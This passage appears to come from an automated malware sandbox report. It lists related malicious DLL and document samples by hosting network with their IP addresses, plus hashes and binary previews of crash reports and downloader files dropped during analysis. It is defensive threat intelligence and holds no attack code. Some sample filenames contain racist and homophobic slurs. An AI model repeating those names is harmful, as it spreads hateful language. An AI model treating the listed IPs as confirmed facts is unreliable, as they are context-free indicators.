                                                                                                                                                                        nBtjFS1D08.dllGet hashmaliciousBrowse
                                                                                                                                                                          q8HPR8Yypk.dllGet hashmaliciousBrowse
                                                                                                                                                                            mZuFa05xCp.dllGet hashmaliciousBrowse
                                                                                                                                                                              TEm3oBxeXS.dllGet hashmaliciousBrowse
                                                                                                                                                                                ma9Kq24IDH.dllGet hashmaliciousBrowse
                                                                                                                                                                                  U8GZ7uVALA.dllGet hashmaliciousBrowse

                                                                                                                                                                                    Domains

                                                                                                                                                                                    No context

                                                                                                                                                                                    ASN

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    ARUBA-ASNITGYRxsMXKtvwSwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 94.177.217.88
                                                                                                                                                                                    KsXtuXmxoZvgudVwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 94.177.217.88
                                                                                                                                                                                    xTpcaEZvwmHqwhoreniggagay.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 94.177.217.88
                                                                                                                                                                                    invoice template 33142738819.docxGet hashmaliciousBrowse
                                                                                                                                                                                    • 94.177.217.88
                                                                                                                                                                                    2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    QUOTATION FORM.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.149.128.45
                                                                                                                                                                                    MA4UA3e5xeGet hashmaliciousBrowse
                                                                                                                                                                                    • 46.37.10.252
                                                                                                                                                                                    SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    seL794VuEmGet hashmaliciousBrowse
                                                                                                                                                                                    • 31.14.139.79
                                                                                                                                                                                    b6GJG5t0kgGet hashmaliciousBrowse
                                                                                                                                                                                    • 31.14.139.51
                                                                                                                                                                                    U4pi8WRxNJ.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    oERkAQeB4d.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    FC9fpZrma1.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    Z4HpRSQD6I.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.237.56.116
                                                                                                                                                                                    OnlineSASFR2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35
                                                                                                                                                                                    spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35
                                                                                                                                                                                    AtlanticareINV25-67431254.htmGet hashmaliciousBrowse
                                                                                                                                                                                    • 51.15.17.195
                                                                                                                                                                                    9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    9sQccNfqAR.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    t3XtgyQEoe.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    67MPsax8fd.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 163.172.208.8
                                                                                                                                                                                    Linux_x86Get hashmaliciousBrowse
                                                                                                                                                                                    • 212.83.174.79
                                                                                                                                                                                    184285013-044310-Factura pendiente (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 212.83.130.20
                                                                                                                                                                                    MTjXit7IJnGet hashmaliciousBrowse
                                                                                                                                                                                    • 51.158.219.54
                                                                                                                                                                                    SCAN_35292280954166786.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.133.20
                                                                                                                                                                                    gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35
                                                                                                                                                                                    mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35
                                                                                                                                                                                    dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35
                                                                                                                                                                                    jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35
                                                                                                                                                                                    mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 195.154.146.35

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    No context

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    No context

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.3593198815979092
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                                                                    MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                                                                    SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                                                                    SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                                                                    SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: .............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:MPEG-4 LOAS
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                                    Entropy (8bit):0.24943428834928685
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4A:BJiRdwfu2SRU4A
                                                                                                                                                                                    MD5:B2D45A80EA769F25C1C2EFDD67818C3A
                                                                                                                                                                                    SHA1:45AC7A4AECB297426301AC11FC4DF16551BBAAC9
                                                                                                                                                                                    SHA-256:5C083C754299A4D45F65F8A74042F97FF42E26316F60C5CF2AC8AA84C8D2ED7E
                                                                                                                                                                                    SHA-512:5BCCFB0D9C3AD5A60BFFCB1893B61E82EBF6F525304A766C2D35EA3A236649C0B048A4F626C978208C5FF2B0FB727CEDBC60447292A3AF39F2B9B3E9851FD7F8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x16be3dae, page size 16384, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):786432
                                                                                                                                                                                    Entropy (8bit):0.2505844284922648
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:0D9+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:0D+SB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                    MD5:63702945B791BBB0C21E40878F2A5902
                                                                                                                                                                                    SHA1:8A0ED5C5807DBF6C51B0EF4EA541E73D2C4B1121
                                                                                                                                                                                    SHA-256:26C672ECC68B6B031FE175CCFAED8FA2C31579A37673200AB3CADFC20D492359
                                                                                                                                                                                    SHA-512:4F2B15F9FD380CE39D372BA6C985C8304DFFB2174EDB3CF4A35747B86EF75B57FE83B4761FDF8207CBA75E79254BD2E0B3C715EF0A4FD183F2361EAC9C51309F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ..=.... ................e.f.3...w........................).....-....y.......yy.h.(.....-....y....)..............3...w...........................................................................................................B...........@...................................................................................................... ....................................................................................................................................................................................................................................................4.-....y....................`.-....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                    Entropy (8bit):0.07621309055838829
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:f6OtT7v5vvPVnpTopcAWlYI6nPill3Vkttlmlnl:SurxvP70xWlY1PG3
                                                                                                                                                                                    MD5:8CA951A8A7C1C8A9DACAA71B609D252F
                                                                                                                                                                                    SHA1:9A6E040171D53DB4215BE31EDB6A179E64F7CAC6
                                                                                                                                                                                    SHA-256:7E479E3240DA4D61AB81231F0B350F1E810D251809FA7D953C54AB910C3AE9DF
                                                                                                                                                                                    SHA-512:0BC0A8E69465C57BE5BE0948577B5BB2D9286B02BB569ADDA39254D1075A24D6243BE95449DE8D80753154779BCC9AB9BC57B3A32FA9A912DF3D6B8A858C444D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ...&.....................................3...w.......y..-....y..........-....y..-....y.....-....y%...................`.-....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8f98a6f9895b5a351f9a3e818d899c7f87e7c39c_d70d8aa6_123f08d6\Report.wer
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):0.6744157369383946
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:JFWzZqyXy9hkoyt7JfjpXIQcQ5c6A2cE2cw33+a+z+HbHgiqVG4rmMOyWZAXGngY:cBnHnM28jjNq/u7sbS274ItW
                                                                                                                                                                                    MD5:51B76B0379E94D60BCEE38EF6771D5BB
                                                                                                                                                                                    SHA1:DB76C11D87138DA8DAFF21CE3DBC4F49D5CB833F
                                                                                                                                                                                    SHA-256:FFD4C554AC1546ADEF3BE859F5AEFE12EE0C4FD78E33DD7D3B46F594DEEF43F3
                                                                                                                                                                                    SHA-512:2014274CCB34D700C1077440208CD0CB85DF1B312ABDAC482DA76022AE4AC04AD187A1627F39378C72A61DB35C9108FF8D6734D513DBB4BF9EA8E871F9CE8881
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.8.4.7.8.4.7.6.0.0.9.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.c.e.b.c.5.7.-.2.b.c.0.-.4.b.8.0.-.a.2.8.e.-.2.d.b.1.9.4.7.7.e.2.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.4.2.3.8.1.e.-.b.8.8.8.-.4.1.a.4.-.b.f.c.2.-.1.9.0.3.c.9.e.d.3.8.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.7.-.d.4.5.f.-.8.4.c.4.2.1.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_c88ef9c8adc7184426523373a8db842e0fd5b2a_d70d8aa6_1bb754a4\Report.wer
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                    Entropy (8bit):0.6826593122558421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:Ig5FTzZqyJy9hkoH7JAWpXIQcQQc61bcEocw3e+a+z+HbHgiqVG4rmMOyWZAXGnQ:pLBiHuliQjNq/u7sCS274ItW
                                                                                                                                                                                    MD5:CDA0FB1E6A591094C106B5158EBE1C9D
                                                                                                                                                                                    SHA1:0236BEA4B212F842FC3928773D669AE3D2E1B2C3
                                                                                                                                                                                    SHA-256:22F608F1D8782385FF97ADB0A614DB7E0103F408695E6797E7E39D055C5C44BD
                                                                                                                                                                                    SHA-512:3CC113CE1E3329F7E8A43D3B96E141FEE6AAD1F1D2B19F6F78080AE63974C628AFF143C44DCB9659390C896BD2DE847C1E8E58AE0823FFE24F30FF920FB4174D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.8.4.7.9.4.3.3.0.0.3.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.8.4.8.0.6.1.7.3.7.3.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.6.f.5.7.2.9.-.0.b.0.3.-.4.f.6.4.-.b.d.5.b.-.c.6.1.5.c.b.8.d.b.0.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.2.f.b.9.5.e.-.c.f.5.5.-.4.b.6.7.-.8.5.0.6.-.f.1.d.9.3.8.0.c.5.0.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.7.-.d.4.5.f.-.8.4.c.4.2.1.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E23.tmp.dmp
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 02:13:15 2021, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1049436
                                                                                                                                                                                    Entropy (8bit):1.362376334851804
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:BRLI4NpmGhzIso7Q4xuwCt6dcRiuYyPbg0UCH3KPVKp9cXGIsGave:oIbdM7Q4xuT6jcDHHNpWGIGve
                                                                                                                                                                                    MD5:2C4D62CC88717CC16B20E26D6AAA523F
                                                                                                                                                                                    SHA1:B2EEC3F7353D7D562834F5E81EE80B0D83C56CA5
                                                                                                                                                                                    SHA-256:A41FC2670FA57445DAB6C93AC789391A83CBE29385F1B98DE623430CB6826267
                                                                                                                                                                                    SHA-512:D2A03E72B6E2EA2A6D44F5CDC31544DD902D74520D0ADBE59DB7B355E2852E86AE2652EDC0847232B299CC4971C1FDBA6DF1462DF80BC6982E8082764F994149
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: MDMP....... ........+.a............4...............H.......$...........4...............`.......8...........T...........@................................................................................................U...........B......p.......GenuineIntelW...........T.......\....+.a4............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B5B.tmp.csv
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):50186
                                                                                                                                                                                    Entropy (8bit):3.0515154114709233
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uofHEpaEEdwrlfiOCIsYXiDddOVJG4MjbJ4DMS5e/lAdX7mvTDUJ02xt8TpcYqMh:uCHEp+wxfilIsYXoSJG4MjbE4ct8lj6C
                                                                                                                                                                                    MD5:F704F9AE085C2CCC51E3B37B5A68DFE3
                                                                                                                                                                                    SHA1:6F0A1F98B0E06DDF956E3B8C61DF55273446D142
                                                                                                                                                                                    SHA-256:EFF204574EE97A4AE40CEC16E9228126E7D18F29E78533A8FC62DE3D48A7C302
                                                                                                                                                                                    SHA-512:2FF2AC3A53077C928204D62504FCB7529327F6F6F0EC384919A68C67489304714665464BBFD2BD2DBA23BC0C17D8F19A179197C5EE7D5599F8C7421A394084E8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F05.tmp.txt
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                                    Entropy (8bit):2.694840145436276
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:9GiZYWlou8a/0WYEYFWuHYUYEZg9ytriRoq0uws9Yh2aN/EDJGE3Ivs3:9jZDImz/95Kh2aN/EDJtYvs3
                                                                                                                                                                                    MD5:9D9F8B22466D8BA50B02FF98B0F7C6C3
                                                                                                                                                                                    SHA1:07956404C1BEC89AB3BDE05D2B15A67F88066781
                                                                                                                                                                                    SHA-256:7646F378ACCA679D6E379C305E7728CD01D892747552214921423E3B0BFF3145
                                                                                                                                                                                    SHA-512:AED37DB6DFFA1F02177666F653E250CE6593AEE5EFC3C2E5C368DB267836D468D27BE8D54C62702CFE104935071CC9E2C825EA749417A9069EDF4F969B374CF7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER32A6.tmp.WERInternalMetadata.xml
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8340
                                                                                                                                                                                    Entropy (8bit):3.704264697478702
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNilDY6DVQ6Yg4SU27gmfqSgCpDe89bK4ybsfaum:RrlsNie626YPSU27gmfqSnK4ygfK
                                                                                                                                                                                    MD5:5B0A2062FAA55CC78242B7E69034BF12
                                                                                                                                                                                    SHA1:90456C6AA95D2B9426CB584E0686D7B7922E4E41
                                                                                                                                                                                    SHA-256:A8A0729294D9FBACEB9E5D55478595F4CE3030E0F1B8F8F6C2132B7F46B47542
                                                                                                                                                                                    SHA-512:8E85E58DF81491B4C6250A9EAD5D45E9AB36C391081C21151DCE0DA5C9705DE6615A787F98B0195F1F5F1F2DDD37C4EB3631BEE28A083E64F936B09419CE241E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.d.>.......
                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER37E7.tmp.xml
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4598
                                                                                                                                                                                    Entropy (8bit):4.476160181137772
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwSD8zsSJgtWI9t5WSC8B98fm8M4J2yRFr+q84ISKcQIcQwQWd:uITfgCISNMJtfKkwQWd
                                                                                                                                                                                    MD5:A1B6B041C21EE3BE5B6FB46B239C1DBB
                                                                                                                                                                                    SHA1:40AF645A3B5ECB412ABD7B15E26797ADF933F779
                                                                                                                                                                                    SHA-256:CDDD4313FEB364D60F80FFF918CBEC7E5FEA31A90D9E72BBEB1CA00574BB8B94
                                                                                                                                                                                    SHA-512:16D2623977FE562C36C530B716927329ADEEF18B0B45F90CB950B73AFE9FC2F9C9FBC466CA18F748E4494D980B5CF438CC6C95720518F07A46E7FA5391B02515
                                                                                                                                                                                    Malicious:false
